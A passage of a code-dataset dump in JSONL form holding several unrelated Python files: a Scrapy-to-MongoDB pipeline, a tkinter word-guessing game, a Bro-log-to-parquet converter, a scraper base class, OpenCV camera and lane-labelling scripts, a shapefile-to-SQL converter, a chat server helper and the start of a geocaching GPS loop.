fontsize=12)\n\nfig.show()\nplt.close(fig)\n\n\n\n\n\n\n\n\n\n","sub_path":"calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"421346211","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.exceptions import DropItem\nfrom scrapy.conf import settings\nimport logging\nfrom pymongo import MongoClient\nfrom datetime import datetime\n\nclass TestPipeline(object):\n\n def __init__(self, mongo_uri, mongo_db):\n \tself.mongo_uri = mongo_uri\n \tself.mongo_db = mongo_db\n# uri is mongodb path\n @classmethod\n def from_crawler(cls, crawler):\n \treturn cls(\n \t\tmongo_uri = crawler.settings.get('MONGODB_URI'),\n \t\tmongo_db = crawler.settings.get('MONGODB_DB')\n \t)\n\n def open_spider(self, spider):\n \tself.client = MongoClient(self.mongo_uri)\n \tself.db = self.client[self.mongo_db]\n\n def close_spider(self, spider):\n \tself.client.close()\n\n def process_item(self, item, spider):\n valid = True\n for data in item:\n if not data:\n valid = False\n logging.log(logging.ERROR, \"Something Wrong!!\")\n raise DropItem(\"Missing {0}!\".format(data))\n item['Date'] = datetime.strptime(item['Date'][0], '%d/%m/%Y')\n if valid:\n # Cast captured data to Int.\n for i in item['AnData'].keys():\n if i != 'title':\n for index, num in enumerate(item['AnData'][i]):\n item['AnData'][i][index] = int(num)\n for i in item['EiData'].keys():\n if i != 'title':\n for index, num in enumerate(item['EiData'][i]):\n item['EiData'][i][index] = int(num)\n #operation to related DB\n self.db[settings['MONGODB_COLLECTION']].insert(dict(item))\n logging.log(logging.INFO, \"Daily Data in Viet added to MongoDB database!\")\n return item\n\n\n\n\n\n\n","sub_path":"Test/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"124514839","text":"import tkinter\nimport time\nimport random\nimport tkinter.font as tkFont\n\n# 建立視窗\nwin = tkinter.Tk()\nwin.title(\"Help Me!\")\nwin.geometry(\"600x300\")\nwin.configure(bg='#F0F8FF')\n\n# define finish button\ndef finish_adding():\n wordlabel.grid_forget()\n wordbox.grid_forget()\n btn.grid_forget()\n listlabel.grid_forget()\n hide_btn.grid_forget()\n check_btn.grid_forget()\n finish_btn.grid_forget()\n clear_btn.grid_forget()\n addlabel.grid_forget()\n new_word_btn.place(x=125,y=60)\n play_btn.place(x=125,y=100)\n \n# define add button的功能 \ndef addMes():\n # 判斷輸入值是否為空白、長度為0或已存在清單中,若是則不加入清單\n if len(str1.get()) != 0 and \" \" not in str1.get() and str1.get().lower() not in list1 and str1.get().encode( 'UTF-8' ).isalpha(): \n list1.append(str1.get().lower())\n str3.set(str1.get().lower()+\" is sucessfully added \")\n addlabel.grid(row=1,column=1)\n str2.set(list1)\n wordbox.delete(0, 'end')\n else:\n str3.set(\"Please enter another word!\")\n addlabel.grid(row=1,column=1)\n wordbox.delete(0, 'end')\n \n# define隱藏清單button的功能\ndef hide_list():\n listlabel.grid_forget()\n hide_btn.grid_forget()\n check_btn.grid(row=3,column=1)\n \n# define查看清單button的功能\ndef check_list():\n listlabel.grid(row=2,column=1)\n check_btn.grid_forget()\n hide_btn.grid(row=3,column=1)\n\n# define添加題目單字button的功能 \ndef enter_new_word():\n idiotlabel.grid_forget()\n wordlabel.grid(row=0, column=0)\n wordbox.grid(row=0,column=1)\n btn.grid(row=0,column=2)\n new_word_btn.place_forget()\n check_btn.grid(row=3,column=1)\n finish_btn.grid(row=0, column=3)\n clear_btn.grid(row=3, column=2)\n play_btn.place_forget()\n \n# define清除清單中\"最新加入元素\"的button的功能\ndef clear():\n if len(list1) != 0:\n list1.pop()\n str2.set(list1)\n listlabel.grid(row=2,column=1)\n \n# define開始遊戲button的功能 (包含整個遊戲流程) \ndef start_game():\n \n if len(str2.get()) == 0:\n idiotlabel.grid(row=1,column=1)\n return\n \n else:\n \n #define 輸入答案的函數\n def enter():\n \n input_ = input_answer.get().lower()\n input_answer.delete(0, 'end')\n \n if times.get() > 0:\n\n if not input_.encode( 'UTF-8' ).isalpha():\n result1.set(\"Please enter another word! Remain \"+str(times.get())+\" times\")\n return\n \n if input_ == ans.get():\n result2.set(\"You win!The correct answer is \"+\"\".join(ans.get()))\n cv.create_oval(220,50,320,150,fill='cornsilk')\n cv.create_line(260,100,260,110)\n cv.create_line(280,100,280,110)\n cv.create_arc(260, 110, 280,130, start=180, extent=180,fill='orangered')\n times.set(-1)\n return\n \n correct_word = 0\n\n for i in range(0,len(ans.get())):\n if ans.get()[i] == input_:\n temp[i] = input_\n correct_word += 1\n \n if \"-\" not in temp:\n result2.set(\"You win!The correct answer is \"+\"\".join(ans.get()))\n cv.create_oval(220,50,320,150,fill='cornsilk')\n cv.create_line(260,100,260,110)\n cv.create_line(280,100,280,110)\n cv.create_arc(260, 110, 280,130, start=180, extent=180,fill='orangered')\n times.set(-1)\n return\n \n if correct_word == 0:\n times.set(times.get()-1)\n \n result1.set(\"Remain \"+str(times.get())+\" times. 
The answer now is \"+\"\".join(temp))\n result2.set(\"\".join(temp))\n draw(times.get())\n \n if times.get() == 0:\n draw(times.get())\n result2.set(\"IDIOT!The answer is \"+\"\".join(ans.get()))\n times.set(-1)\n\n #define 繪圖的函數 \n def draw(times:int):\n if times == 9:\n cv.create_oval(220,50,320,150,fill='white')\n elif times == 8: \n cv.create_line(270,150,270,250)\n elif times == 7:\n cv.create_line(220,190,270,160)\n elif times == 6:\n cv.create_line(270,160,320,180)\n\n elif times == 5:\n cv.create_line(250,300,270,250)\n elif times == 4:\n cv.create_line(290,300,270,250)\n elif times == 3:\n #alive\n cv.create_line(260,100,260,110)\n elif times == 2:\n cv.create_line(280,100,280,110)\n elif times == 1:\n cv.create_arc(260,120,280,120, start=0, extent=180)\n elif times == 0:\n #die\n cv.create_line(260,100,250,110)\n cv.create_line(250,100,260,110)\n cv.create_line(280,100,290,110)\n cv.create_line(290,100,280,110)\n cv.create_oval(240,20,300,40,fill='yellow')\n cv.create_oval(245,25,295,35,fill='white')\n else:\n return\n \n #define 重新開始的函數\n def restart():\n secwin.destroy()\n start_game()\n\n #設定次數\n times = tkinter.IntVar()\n times.set(10)\n #設定結果的變數\n result1 = tkinter.StringVar()\n result2 = tkinter.StringVar()\n #選擇題目\n ans = tkinter.StringVar()\n ans.set(random.choice(list1))\n #設定顯示的_\n temp = list(\"-\"*len(ans.get()))\n \n secwin=tkinter.Toplevel(win) #建立新的子視窗,可以有多個子視窗\n secwin.geometry(\"500x500\")\n secwin.title(\"Start game\") #子視窗的標題\n secwin.configure(bg = \"lavender\")\n lab1=tkinter.Label(secwin, text=\"The vocabulary you want to guess has \"+str(len(ans.get()))+\" alphabets\",bg = \"lavender\")\n input_answer = tkinter.Entry(secwin, width=20) #建立一個Entry元件\n btn=tkinter.Button(secwin, text=\"Confirm\", command=enter) #建立一個Button的元件\n result_1 = tkinter.Label(secwin,textvariable = result1,bg = \"lavender\")\n result_2 = tkinter.Label(secwin,textvariable = result2,bg = \"lavender\",font = ft)\n cv = tkinter.Canvas(secwin,bg = \"lavender\",height='500',width='500')\n cv.create_line(270,50,270,10)\n cv.create_line(180,10,270,10)\n cv.create_line(180,10,180,350)\n cv.create_line(180,350,270,350)\n \n restart_btn = tkinter.Button(secwin,text = \"Restart\",command = restart)\n \n\n lab1.pack()\n input_answer.pack()\n btn.pack()\n result_1.pack()\n result_2.pack()\n restart_btn.pack()\n cv.pack()\n\n# define 字串物件\nstr3=tkinter.StringVar()\nstr2=tkinter.StringVar()\nstr1=tkinter.StringVar()\n\n# define 基礎元件\nft = tkFont.Font(size=16)\naddlabel=tkinter.Label(win,textvariable=str3,bg='#F0F8FF',font = ft)\nbtn = tkinter.Button(win,text='Add',command=addMes,font = ft)\nwordbox= tkinter.Entry(win,textvariable=str1,font = ft)\nwordlabel= tkinter.Label(win, text=\"Enter the word\",bg='#F0F8FF',font = ft)\nidiotlabel= tkinter.Label(win, text=\"IDIOT!Enter the word!\",bg='#F0F8FF',font = ft)\nhide_btn=tkinter.Button(win, text=\"Hide the words\",command=hide_list,font = ft)\ncheck_btn=tkinter.Button(win, text=\"Show the words\",command=check_list,font = ft)\nnew_word_btn=tkinter.Button(win,text=\"Enter new word\",command=enter_new_word,font = ft)\nfinish_btn=tkinter.Button(win, text='Finish',command=finish_adding,font = ft)\nclear_btn=tkinter.Button(win, text='Clear',command=clear,font = ft)\nplay_btn=tkinter.Button(win,text=\"Start\",command=start_game,font = ft)\nlistlabel=tkinter.Label(win,wraplength=200, justify='left',textvariable=str2,bg='#F0F8FF',font = ft)\n\nnew_word_btn.place(x=125,y=60)\nplay_btn.place(x=125,y=100)\n\n# define 
題目清單\nlist1=['internationalization','legistimate','configuration','elaborate','traumatically','significant']\nstr2.set(list1)\n\nwin.mainloop()\n","sub_path":"english-game-master/main3_new.py","file_name":"main3_new.py","file_ext":"py","file_size_in_byte":8393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308324786","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\nCreated on Thu May 30 08:54:16 2018\n\nRecusively convert compressed bro logs into parquet with rsync style\n\npython mods_bat.py --h\n\n@author: giangnguyen\n\"\"\"\n\nimport gzip\nimport os\nimport numpy as np\nimport pandas as pd\nimport sklearn\nimport shutil\n# import matplotlib.pyplot as plt\nfrom os.path import expanduser\n# from pprint import pprint\n\nimport pyspark\nimport pyarrow\n# from pyspark.sql import SparkSession\n\nimport bat\n# from bat import bro_log_reader\n# from bat.log_to_dataframe import LogToDataFrame\nfrom bat.log_to_parquet import log_to_parquet\n\n\n# Data\ndir_userhome = expanduser(\"~\")\ndir_data = dir_userhome + '/data/deep-dm/'\ndir_logs = dir_data + 'logs/'\ndir_parquet = dir_data + 'logs_parquet/'\n\n\ndef print_libs_versions():\n print('BAT: {:s}'.format(bat.__version__))\n print('Numpy: {:s}'.format(np.__version__))\n print('Pandas: {:s}'.format(pd.__version__))\n print('PyArrow: {:s}'.format(pyarrow.__version__))\n print('PySpark: {:s}'.format(pyspark.__version__))\n print('Scikit Learn: ', sklearn.__version__)\n return\n\n\ndef bro_print_log():\n '''\n dir_day = '2018-05-15/'\n filename = 'conn.00:00:00-01:00:00.log'\n reader = bro_log_reader.BroLogReader(dir_logs + dir_day + filename)\n for row in reader.readrows():\n pprint(row)\n\n bro_df = LogToDataFrame(dir_logs + dir_day + filename)\n $print(bro_df.head())\n '''\n return\n\n\ndef gzip_to_parquet(dir_logs, dir_parquet):\n print(dir_logs, dir_parquet)\n fn_excluded = ['current', 'loaded_scripts']\n\n for root, directories, filenames in os.walk(dir_logs):\n for subdir in directories:\n subdir_parquet = os.path.join(root, subdir).replace(dir_logs, dir_parquet)\n if not os.path.exists(subdir_parquet):\n os.makedirs(subdir_parquet)\n print('mkdir ' + subdir_parquet)\n\n for fn in filenames:\n ffn = os.path.join(root, fn)\n fn_log = ffn.replace(dir_logs, dir_parquet).replace('.log.gz', '.log')\n fn_parquet = fn_log.replace('.log', '.parquet')\n print(ffn)\n\n if not os.path.isfile(fn_parquet) and not any(ss in fn for ss in fn_excluded):\n print('\\t ... decompressing to ' + fn_log)\n with gzip.open(ffn, 'rb') as fin:\n with open(fn_log, 'wb') as fout:\n shutil.copyfileobj(fin, fout)\n\n if 'summary' not in fn_log:\n log_to_parquet(fn_log, fn_parquet)\n os.remove(fn_log)\n print('\\t ... 
converted to ' + fn_parquet)\n return\n\n\ndef main(argv):\n # print_libs_versions()\n # bro_print_log()\n if argv.convert == 'yes':\n gzip_to_parquet(argv.dir_logs, argv.dir_parquet)\n return\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='mods_bat', epilog='---')\n parser.add_argument(\"--convert\", default='yes',\n dest=\"convert\", help=\"convert gzip to parquet\",\n metavar=\"yes/no\")\n parser.add_argument(\"--in\", default=dir_logs,\n dest=\"dir_logs\", help=\"logs directory\",\n metavar=\"path/to/dir/\")\n parser.add_argument(\"--out\", default=dir_parquet,\n dest=\"dir_parquet\", help=\"parquet directory\",\n metavar=\"path/to/dir/\")\n args = parser.parse_args()\n main(args)\n","sub_path":"mods_bat.py","file_name":"mods_bat.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"425531803","text":"# encoding=utf8\r\nfrom json import dumps\r\nfrom urllib.parse import quote\r\nfrom extra import *\r\nfrom random import randint\r\nfrom random import choice\r\nfrom random import shuffle\r\nfrom openpyxl import *\r\n\r\nimport logging\r\nimport os\r\nimport pickle\r\nimport requests\r\nimport time\r\nimport sys\r\nimport pymongo\r\n\r\n\r\n\"\"\"全局配置\"\"\"\r\n\r\n\r\ndef default_mongoconf(ip=\"192.168.2.117\", port=27017, db=\"work_object\", key=None, col_key=\"id\", usr=\"\", pwd=\"\", authdb=\"\"):\r\n key = f\"work{time.time()*(10**6)}_{randint(1000,10000)}\" if not key else key\r\n return {\r\n \"link\": [ip, port],\r\n \"auth\": (usr, pwd),\r\n \"authdb\": authdb,\r\n \"db\": db,\r\n \"col\": key,\r\n \"col_key\": col_key\r\n }\r\n\r\n\r\nclass MONGODB(object):\r\n \"\"\"mongo连接类\"\"\"\r\n\r\n def __init__(self, karg):\r\n super(MONGODB, self).__init__()\r\n self.conf = karg\r\n self.logger = logging.getLogger(type(self).__name__)\r\n self.db = self.conf[\"db\"]\r\n self.col = self.conf[\"col\"]\r\n self.link = self.DB_link(self.conf[\"col_key\"])\r\n\r\n def DB_link(self, key):\r\n \"\"\"Mongo连接\"\"\"\r\n con = pymongo.MongoClient(*self.conf[\"link\"])\r\n if self.conf.get(\"authdb\", None):\r\n con[self.conf[\"authdb\"]].authenticate(*self.conf[\"auth\"])\r\n dbs = con.database_names()\r\n\r\n if self.db not in dbs:\r\n print(f\"| {self.db} created \")\r\n db = con[self.db]\r\n db[self.col].ensure_index(key, unique=True)\r\n return db\r\n\r\n def COL_save(self, data):\r\n \"\"\"数据存储方法\"\"\"\r\n db = self.link\r\n try:\r\n db[self.col].insert(data)\r\n except pymongo.errors.DuplicateKeyError as e:\r\n self.logger.info(e)\r\n except Exception as e:\r\n self.logger.info(e)\r\n\r\nclass bot(object):\r\n \"\"\"docstring for bot\"\"\"\r\n\r\n def __init__(self, mainurl):\r\n super(bot, self).__init__()\r\n self.mainurl = mainurl\r\n self.crawler = Anticrawler(source=mainurl)\r\n self.session = self.crawler.session\r\n self.logger = logging.getLogger(type(self).__name__)\r\n self.hotreload_file = f\"{type(self).__name__}.pkl\"\r\n self.raw_data_file = f\"{type(self).__name__}_raw.json\"\r\n self.raw_data = None\r\n self.raw_data_status = False\r\n self.maxpage = 0\r\n self.retrytimes = 3\r\n self.current_user = None\r\n self.randomUA = True\r\n\r\n def resp_check(self, resp, login=False):\r\n \"\"\"响应处理,429,403错误自动切换用户\"\"\"\r\n if self.randomUA:\r\n self.crawler.random_user_agent()\r\n netcode = resp.status_code\r\n if netcode == 200:\r\n return True\r\n\r\n def sleep_report(self, t):\r\n self.logger.info('Sleeping ... 
Until %s' % time.strftime(\r\n '%Y-%m-%d %H:%M:%S', time.localtime(time.time() + t)))\r\n time.sleep(t)\r\n\r\n def get_new_identity(self, broken_user=None, code=0):\r\n \"\"\"获取新身份\"\"\"\r\n pass\r\n\r\n def data_parser(self, *arg):\r\n \"\"\"数据抽取清洗收录\"\"\"\r\n _ = arg\r\n resdata = {}\r\n return resdata\r\n\r\n def hotreload_load(self):\r\n \"\"\"热启动\"\"\"\r\n if os.path.exists(self.hotreload_file):\r\n with open(self.hotreload_file, \"rb\") as f:\r\n try:\r\n self.session = pickle.load(f)\r\n self.crawler.session = self.session\r\n self.logger.info(\"Hotreload Compleate\")\r\n return True\r\n except Exception as e:\r\n self.logger.error(e)\r\n\r\n def hotreload_save(self):\r\n \"\"\"热启动配置存取\"\"\"\r\n with open(self.hotreload_file, \"wb\") as f:\r\n pickle.dump((self.session), f)\r\n self.logger.info(\"Hotreload File Saved\")\r\n return True\r\n\r\n def raw_data_save(self, data, filename=None):\r\n \"\"\"部分源数据存取\"\"\"\r\n filename = filename if filename else self.raw_data_file\r\n with open(filename, \"w\", encoding=\"utf8\") as f:\r\n f.write(dumps(data, indent=4, ensure_ascii=False))\r\n self.logger.info(\"Rawdata File Saved\")\r\n\r\n def html_data_save(self, html, name=\"test.html\"):\r\n with open(name, \"w\") as f:\r\n f.write(html)\r\n\r\n def sign_in(self):\r\n \"\"\"登录并获取凭证\"\"\"\r\n pass\r\n\r\n def reload_main_page(self):\r\n \"\"\"翻页爬行\"\"\"\r\n pass\r\n\r\n def get_data(self, format_url, format_data=None, types=\"\", params=None, extraheader=None):\r\n params = params if params else {}\r\n url = format_url if format_data is None else format_url.format(\r\n *format_data)\r\n self.logger.info(url)\r\n resp = self.session.get(url, params=params, headers=extraheader)\r\n resp.encoding = \"utf8\"\r\n if self.resp_check(resp):\r\n return self.data_parser(types, resp)\r\n else:\r\n self.logger.error(resp.status_code)\r\n\r\n \"\"\"获取指定目标数据\"\"\"\r\n pass\r\n\r\n def post_data(self, format_url, format_data=None, types=\"\", params=None, data=None, json=None,extraheader=None):\r\n params = params if params else {}\r\n url = format_url if format_data is None else format_url.format(\r\n *format_data)\r\n self.logger.info(url)\r\n resp = self.session.post(url, params=params, data=data, json=json,headers=extraheader)\r\n resp.encoding=\"utf8\"\r\n if self.resp_check(resp):\r\n return self.data_parser(types, resp)\r\n else:\r\n self.logger.error(resp.status_code)\r\n\r\n \"\"\"获取指定目标数据\"\"\"\r\n pass\r\n\r\n def start(self):\r\n \"\"\"启动\"\"\"\r\n pass\r\n\r\n def setproxy(self, uri):\r\n self.session.proxies = {\"https\": uri, \"http\": uri}\r\n\r\n\r\ndef save_worker(data, filename=\"res.pkl\"):\r\n with open(filename, \"wb\") as f:\r\n pickle.dump((data), f)\r\n\r\n\r\ndef load_worker(filename=\"res.pkl\"):\r\n with open(filename, \"rb\") as f:\r\n return pickle.load(f)\r\n","sub_path":"scrapyzhihu/public/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59743568","text":"import cv2\nimport sys\nfrom cobit_lane_follower import CobitLaneFollower\n\nvideo_file = sys.argv[1]\nlane_follower = CobitLaneFollower()\n\ncap = cv2.VideoCapture(video_file)\ni = 0\n\nwhile True:\n\tret, img_org = cap.read()\n\tif ret:\n\t\tlane_lines, img_lane = lane_follower.get_lane(img_org)\n\t\tcv2.imshow(\"ddd\", img_org)\n\t\tangle, img_lane = lane_follower.get_steering_angle(img_lane, lane_lines)\n\t\tif img_lane is None:\n\t\t\tpass\n\t\telse:\n\t\t\tcv2.imwrite(\"%s_%03d_%03d.png\" % (video_file, i, angle), img_org)\n\t\t\ti += 1\t\n\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\tbreak\n\telse:\n\t\tprint(\"cap error\")\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"old_code/lane_follower_3_get_label.py","file_name":"lane_follower_3_get_label.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"314196506","text":"import cv2\nimport multiprocessing\n\n\ndef camera1():\n global cap1\n cap1 = cv2.VideoCapture(0)\n while True:\n _, frame1 = cap1.read()\n cv2.imshow('frame1', frame1)\n\n k = cv2.waitKey(5)\n if k == 27:\n break\n cap1.release()\n\n\ndef camera2():\n global cap2\n cap2 = cv2.VideoCapture(0)\n while True:\n _, frame2 = cap2.read()\n cv2.imshow('frame2', frame2)\n\n k = cv2.waitKey(5)\n if k == 27:\n break\n cap2.release()\n\n\ndef cap_images():\n _, img1 = cap1.read()\n _, img2 = cap2.read()\n cv2.imwrite(\"Image1.png\", img1)\n cv2.imwrite(\"Image2.png\", img2)\n\n\nif __name__ == '__main__':\n p1 = multiprocessing.Process(target=camera1)\n p1.start()\n p2 = multiprocessing.Process(target=camera2)\n p2.start()\n\ncap1.release()\ncap2.release()\ncv2.destroyAllWindows()","sub_path":"dataset/merging.py","file_name":"merging.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"447033156","text":"#!/usr/bin/python3\r\n\r\nimport os\r\nimport re\r\nimport subprocess\r\n\r\nimport libs.pyshp.shapefile as shapefile\r\nimport fileHandlers.geojson as geojson\r\n\r\nfrom fileHandlers.geojson import GEOMETRY_COLUMN_SRID\r\nfrom fileHandlers.geojson import GEOMETRY_COLUMN_NAME\r\n\r\nfrom utils import ENCODERS_LIST\r\n\r\nfrom logs import Logs\r\nfrom logs import printLogs as print\r\n\r\ndef getShpProjection(file):\r\n # inegi projections\r\n inegiPrj = {\r\n \"4489\": [\"MEXICO_ITRF_1992_UTM_Zone_16N\"],\r\n \"4488\": [\"MEXICO_ITRF_1992_UTM_Zone_15N\"],\r\n \"4487\": [\"MEXICO_ITRF_1992_UTM_Zone_14N\"],\r\n \"4486\": [\"MEXICO_ITRF_1992_UTM_Zone_13N\"],\r\n \"4485\": [\"MEXICO_ITRF_1992_UTM_Zone_12N\"],\r\n \"4484\": [\"MEXICO_ITRF_1992_UTM_Zone_11N\"],\r\n \"6371\": [\"MEXICO_ITRF_2008_UTM_Zone_16N\"],\r\n \"6370\": [\"MEXICO_ITRF_2008_UTM_Zone_15N\"],\r\n \"6369\": [\"MEXICO_ITRF_2008_UTM_Zone_14N\"],\r\n \"6368\": [\"MEXICO_ITRF_2008_UTM_Zone_13N\"],\r\n \"6367\": [\"MEXICO_ITRF_2008_UTM_Zone_12N\"],\r\n \"6366\": [\"MEXICO_ITRF_2008_UTM_Zone_11N\"],\r\n \"6362\": [\"MEXICO_ITRF_1992_LCC\",\"North_America_Lambert_Conformal_Conic\"],\r\n \"6372\": [\"MEXICO_ITRF_2008_LCC\"]\r\n }\r\n\r\n # validate projection\r\n projFile = open(file).read().lower()\r\n\r\n srid = GEOMETRY_COLUMN_SRID\r\n for key in inegiPrj:\r\n for srs_name in inegiPrj[key]:\r\n if re.match(\".*\" + srs_name.lower() + \".*\", projFile) is not None:\r\n return key\r\n\r\n return srid\r\n\r\n\r\ndef process(file, datasetName, outputDir):\r\n sqlFilePath = \"{outputDir}/{script}.sql\".format(outputDir=outputDir, script=datasetName)\r\n\r\n # get shp projection\r\n srid = GEOMETRY_COLUMN_SRID\r\n\r\n projFileName = file[:-4] + \".prj\"\r\n\r\n if os.path.exists(projFileName):\r\n srid = getShpProjection(projFileName)\r\n\r\n for encoder in ENCODERS_LIST:\r\n try:\r\n print(\"Leyendo archivo\", {\"encoding\": encoder})\r\n reader = shapefile.Reader(file, encoding=encoder)\r\n fields = reader.fields[1:]\r\n field_names = [field[0] for field in fields]\r\n buffer = []\r\n for sr in reader.shapeRecords():\r\n atr = dict(zip(field_names, sr.record))\r\n geom = sr.shape.__geo_interface__\r\n buffer.append(dict(type=\"Feature\", geometry=geom, properties=atr))\r\n\r\n geojsonObject = {\r\n \"type\": \"FeatureCollection\",\r\n \"features\": buffer\r\n }\r\n\r\n geojson.writeSQLScript(file, datasetName, outputDir, geojsonObject=geojsonObject, srid=srid)\r\n\r\n return\r\n except UnicodeDecodeError as unicodeError:\r\n print(\"no se pudo leer el archivo\", Logs.ERROR, {\"error\": str(unicodeError)})\r\n else:\r\n print(\"no se encontro el archivo .prj\")\r\n","sub_path":"src/fileHandlers/shp.py","file_name":"shp.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"515849419","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nclass SendFirendMemebr(object):\n '''\n 用户登录成功后返给客户端的好友名称和群聊名称\n find_friend_table_name 通过用户名在数据库中查找当前用户的好友信息表名\n send_friend_info 向客户端发送好友名称和群聊名称\n '''\n\n def __init__(self, uname, connfd, addr, sql):\n self.uname = uname\n self.connfd = connfd\n self.addr = addr\n self.sql = sql\n\n # def find_friend_table_name(self):\n # sql_table = \"select username2 from friends where username1 = %s\"\n # tuple_table_name = self.sql.get_info(sql_table, [self.uname])\n # friend_table_name = tuple_table_name[0][0]\n # return friend_table_name\n\n def send_friend_info(self):\n\n sql = \"select username2 from friends where username1=%s\"\n firend_list = self.sql.get_info(sql, [self.uname])\n\n self.connfd.sendto(b'begin_send_friend_list', self.addr)\n\n if firend_list:\n for friend_name in firend_list:\n self.connfd.sendto(friend_name[0].encode(), self.addr)\n\n self.connfd.sendto(b'over_send_friend_list', self.addr)\n\n sql = \"select groupname from group_user where username=%s\"\n group_list = self.sql.get_info(sql, [self.uname])\n self.connfd.sendto(b'begin_send_group_list', self.addr)\n if group_list:\n for group_name in group_list:\n self.connfd.sendto(group_name[0].encode(), self.addr)\n # for group in set(group_list):\n # self.connfd.sendto(group.encode(), self.addr)\n self.connfd.sendto(b\"over_send_group_list\", self.addr)\n","sub_path":"AID1806项目/聊天室2/server10-13/send_friend_memebr.py","file_name":"send_friend_memebr.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"628585611","text":"#!/usr/bin/env python\n\nimport os\nimport string\nimport time\nimport lib.gislib as gislib\nfrom lib.ledhandler import LedHandler, LED_ON, LED_OFF\nfrom lib.gpshandler import GpsHandler\nfrom lib.geocachefinder import GeocacheFinder\nfrom lib.geocachedisplay import GeocacheDisplay\nfrom lib.geocacheloader import GeocacheLoader\nfrom lib.tracklogexporter import TracklogExporter\nfrom lib.dashboard import Dashboard\nimport lib.databaseinit\nfrom pyspatialite import dbapi2 as spatialite\nfrom calendar import timegm\nimport ConfigParser\n\nconfig = ConfigParser.RawConfigParser({'MEASUREMENT_STANDARD': 'US', 'TIME_ZONE': 'US/Central'})\nconfig.read('cacheberrypi.cfg')\n\nMEASUREMENT_STANDARD = config.get('Settings', 'MEASUREMENT_STANDARD')\ntimezone = config.get('Settings', 'TIME_ZONE')\nSCROLL_SPEED = config.getint('Settings', 'DISPLAY_SCROLL_SPEED')\nGEOCACHE_SOURCE = config.get('Advanced', 'GEOCACHE_SOURCE')\nTRACKLOG_TARGET = config.get('Advanced', 'TRACKLOG_TARGET')\nTRACKLOG_EXPORT_TARGET = config.get('Advanced', 'TRACKLOG_EXPORT_TARGET')\nDATABASE_FILENAME = config.get('Advanced', 'DATABASE_FILENAME')\nLED_PINS = map(int,(config.get('Advanced', 'LED_PINS')).split(','))\nLED_SEARCH_STATUS = 2\nLED_CLOSE = 1\nos.environ['TZ'] = timezone # set environment variable TZ from 'timezone'\ntime.tzset() # set timezone in python to match the os timezone setting\n\ndef mainloop(led, gps, finder, geocache_display, dashboard):\n while 1:\n # grab current state from GPS and update finder location\n gps_state = gps.state()\n finder.update_position(gps_state['p'])\n finder.update_speed(gps_state['s'])\n finder.update_bearing(gps_state['b'])\n\n if MEASUREMENT_STANDARD == 'US': # convert speed from meters/sec to MPH or KPH\n speed = (gps_state['s'] * 2.23694)\n units = 'mph'\n elif units == 'METRIC':\n speed = (gps_state['s'] * 3.6)\n units = 'kph'\n else:\n raise ValueError('MEASUREMENT_STANDARD must be \"US\" or \"METRIC\"')\n\n try:\n clock = localize_time(time.strptime(gps_state['t'], '%Y-%m-%dT%H:%M:%S.000Z'))\n except:\n clock = None\n\n dashboard.update(\n clock,\n speed, \n gislib.humanizeBearing(gps_state['b']),\n units)\n\n # grab current closest cache \n closest = finder.closest()\n\n if closest:\n distance = gislib.getDistance(gps_state['p'], closest['position']) * 1000\n geocache_display.update(\n closest[\"description\"],\n closest[\"URL\"],\n gislib.humanizeBearing(gps_state['b']) if gps_state['s'] > 2 else '',\n gislib.humanizeBearing(gislib.calculateBearing(gps_state['p'], closest['position'])),\n distance,\n MEASUREMENT_STANDARD\n )\n\n geocache_display.show(distance < 1000) #if within 1km show in foreground (on top)\n\n # blink close light if we are not moving and within 100m or if we are moving and\n # our ETA is within 45 seconds.\n if (gps_state['s'] < 10 and distance < 100) or \\\n (gps_state['s'] >= 10 and (float(distance)/gps_state['s']) < 45):\n led.toggle(LED_CLOSE)\n else:\n led.set(LED_CLOSE, LED_ON)\n\n else:\n geocache_display.hide()\n\n time.sleep(.5)\n\ndef localize_time(utctime): # Converts a struct_time tuple from UTC to Local Time\n unixtime = timegm(utctime) # Convert utctime to seconds since the epoch\n localized_time = time.localtime(unixtime) # convert unixtime to a localized struct_time \n return localized_time\n \nif __name__=='__main__':\n\n if not os.path.exists(DATABASE_FILENAME):\n lib.databaseinit.create(DATABASE_FILENAME)\n\n led = LedHandler(LED_PINS)\n\n gps = GpsHandler(TRACKLOG_TARGET)\n gps.start()\n\n tracklogexport = 
